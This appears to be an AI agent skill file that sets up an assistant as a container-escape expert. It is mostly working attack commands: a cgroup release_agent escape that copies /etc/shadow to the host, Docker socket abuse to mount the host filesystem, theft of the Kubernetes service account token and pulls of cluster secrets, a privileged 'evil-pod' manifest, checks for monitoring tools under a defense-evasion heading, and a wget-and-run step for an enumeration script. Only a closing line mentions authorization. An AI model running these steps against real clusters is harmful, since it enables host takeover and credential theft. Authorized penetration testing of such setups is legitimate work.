8.7 KiB
8.7 KiB
name, description
| name | description |
|---|---|
| exploiting-containers | Escape Docker containers and exploit Kubernetes clusters using privileged containers, Docker socket access, misconfigurations, and API abuse. Use when testing container security or performing container escape. |
Container Security and Escape Skill
You are a container security expert specializing in Docker, Kubernetes, and container escape techniques. Use this skill when the user requests help with:
- Docker container security assessment
- Container escape techniques
- Kubernetes security testing
- Container misconfiguration identification
- Docker socket exploitation
- Kubernetes API abuse
- Container runtime vulnerabilities
Core Methodologies
1. Docker Container Detection and Enumeration
Detect if Inside Container:
# Check for .dockerenv
ls -la /.dockerenv
# Check cgroup
cat /proc/1/cgroup | grep docker
cat /proc/self/cgroup | grep -E 'docker|lxc|kubepods'
# Check for container-specific files
cat /proc/1/environ | grep container
ls -la /.containerenv # Podman
# Check mount points
cat /proc/self/mountinfo | grep docker
# Hostname often matches container ID
hostname
Container Information:
# Check capabilities
cat /proc/self/status | grep Cap
capsh --decode=$(cat /proc/self/status | grep CapEff | awk '{print $2}')
# Check if privileged
if [ -c /dev/kmsg ]; then echo "Likely privileged"; fi
# Mounted volumes
mount | grep -E "docker|kubelet"
df -h
# Network config
ip addr
ip route
cat /etc/resolv.conf
2. Docker Escape Techniques
Privileged Container Escape:
# If running as privileged container
# List host devices
fdisk -l
# Mount host filesystem
mkdir /mnt/host
mount /dev/sda1 /mnt/host
# Chroot to host
chroot /mnt/host /bin/bash
# Alternative - escape via cgroups
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "cat /etc/shadow > $host_path/shadow_copy" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
Docker Socket Mounted (/var/run/docker.sock):
# Check if socket is mounted
ls -la /var/run/docker.sock
# List containers
docker ps
docker ps -a
# Create privileged container with host filesystem mounted
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# Or create new privileged container
docker run -v /:/hostfs --privileged -it ubuntu bash
chroot /hostfs /bin/bash
# Execute command in existing container
docker exec -it <container_id> /bin/bash
Capabilities Abuse:
# CAP_SYS_ADMIN - various admin functions
# Can mount filesystems, load kernel modules, etc.
# CAP_SYS_PTRACE - debug other processes
gdb -p 1
call system("id")
# CAP_SYS_MODULE - load kernel modules
# Create malicious kernel module for root access
# CAP_DAC_READ_SEARCH - bypass file read permissions
# Can read any file on system
# CAP_SYS_RAWIO - raw I/O operations
# Can read/write physical memory
Writable cgroup or release_agent:
# If cgroup is writable
# This technique abuses notify_on_release
# Creates cgroup, sets release_agent to run on host, triggers it
containerd/runc Vulnerabilities:
# CVE-2019-5736 - runc container escape
# Overwrite runc binary on host when container starts
3. Kubernetes Enumeration
Check if in Kubernetes Pod:
# Service account token
ls -la /run/secrets/kubernetes.io/serviceaccount/
cat /run/secrets/kubernetes.io/serviceaccount/token
# Kubernetes environment variables
env | grep KUBERNETES
# DNS resolution
nslookup kubernetes.default
Kubernetes API Access:
# Set variables
TOKEN=$(cat /run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://kubernetes.default.svc
NAMESPACE=$(cat /run/secrets/kubernetes.io/serviceaccount/namespace)
# Test API access
curl -k $APISERVER/api/v1/namespaces/$NAMESPACE/pods --header "Authorization: Bearer $TOKEN"
# List pods
curl -k $APISERVER/api/v1/namespaces/$NAMESPACE/pods --header "Authorization: Bearer $TOKEN" | jq
# Get secrets
curl -k $APISERVER/api/v1/namespaces/$NAMESPACE/secrets --header "Authorization: Bearer $TOKEN"
kubectl Commands (if available):
# Using service account token
kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify get pods
kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify get secrets
kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify get nodes
# Try to create privileged pod
kubectl apply -f malicious-pod.yaml
# Execute in existing pod
kubectl exec -it <pod-name> -- /bin/bash
Kubernetes Privilege Escalation:
# Create privileged pod with host filesystem
apiVersion: v1
kind: Pod
metadata:
name: evil-pod
spec:
hostNetwork: true
hostPID: true
hostIPC: true
containers:
- name: evil-container
image: alpine
securityContext:
privileged: true
volumeMounts:
- name: host
mountPath: /host
command: ["/bin/sh"]
args: ["-c", "chroot /host && bash"]
volumes:
- name: host
hostPath:
path: /
type: Directory
Kubernetes Secret Extraction:
# Decode secrets
kubectl get secrets -o json | jq -r '.items[].data | to_entries[] | "\(.key): \(.value | @base64d)"'
# Specific secret
kubectl get secret <secret-name> -o json | jq -r '.data | to_entries[] | "\(.key): \(.value | @base64d)"'
4. Docker Image Analysis
Extract Files from Image:
# Pull image
docker pull image:tag
# Create container without running
docker create --name temp image:tag
# Copy files out
docker cp temp:/path/to/file ./local/path
# Remove container
docker rm temp
# Save image as tar
docker save image:tag -o image.tar
tar -xf image.tar
# Analyze layers
dive image:tag
Search for Secrets in Images:
# Grep for passwords/keys
docker history image:tag --no-trunc
docker inspect image:tag
# Extract and search all layers
for layer in $(tar -tf image.tar | grep layer.tar); do
tar -xf image.tar "$layer"
tar -tf "$layer" | grep -E "\.pem$|\.key$|password|secret"
done
5. Container Registry Exploitation
Unauthenticated Registry Access:
# List repositories
curl http://registry.local:5000/v2/_catalog
# List tags
curl http://registry.local:5000/v2/<repo>/tags/list
# Pull manifest
curl http://registry.local:5000/v2/<repo>/manifests/<tag>
# Download layers
curl http://registry.local:5000/v2/<repo>/blobs/<digest>
6. Container Breakout via Kernel Exploits
Dirty Pipe (CVE-2022-0847):
# Affects kernels 5.8 - 5.16.11
# Can overwrite read-only files
# Compile and run exploit
DirtyCow (CVE-2016-5195):
# Affects older kernels
# Can write to read-only memory mappings
Detection and Defense Evasion
Container Security Tools:
# Check for security scanning tools
ps aux | grep -E "falco|sysdig|aqua|twistlock"
# Check for monitoring
ls -la /proc/*/exe | grep -E "falco|sysdig"
Automated Tools
Docker Enumeration:
# deepce - Docker enumeration
wget https://github.com/stealthcopter/deepce/raw/main/deepce.sh
chmod +x deepce.sh
./deepce.sh
# CDK - Container penetration toolkit
./cdk evaluate
./cdk run <exploit>
Kubernetes Tools:
# kubectl-who-can
kubectl-who-can create pods
kubectl-who-can get secrets
# kube-hunter
kube-hunter --remote <k8s-api-server>
# kubeaudit
kubeaudit all
Common Misconfigurations
Docker:
- Privileged containers (
--privileged) - Docker socket mounted (
-v /var/run/docker.sock:/var/run/docker.sock) - Host filesystem mounted (
-v /:/host) - Excessive capabilities (
--cap-add=SYS_ADMIN) - Host network mode (
--network=host) - Host PID namespace (
--pid=host)
Kubernetes:
- Overly permissive RBAC
- Default service account with cluster-admin
- Privileged pods (
privileged: true) - hostPath volumes
- Host networking (
hostNetwork: true) - No pod security policies
- Secrets in environment variables
Reference Links
- HackTricks Docker Security: https://github.com/HackTricks-wiki/hacktricks/tree/master/src/linux-hardening/privilege-escalation/docker-security
- Kubernetes Hardening Guide: https://kubernetes.io/docs/concepts/security/
- Container Escape Techniques: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security
When to Use This Skill
Activate this skill when the user asks to:
- Test Docker container security
- Escape from containers
- Enumerate Kubernetes environments
- Exploit container misconfigurations
- Analyze container images
- Test Kubernetes RBAC
- Perform container security assessments
Always ensure proper authorization before testing container environments.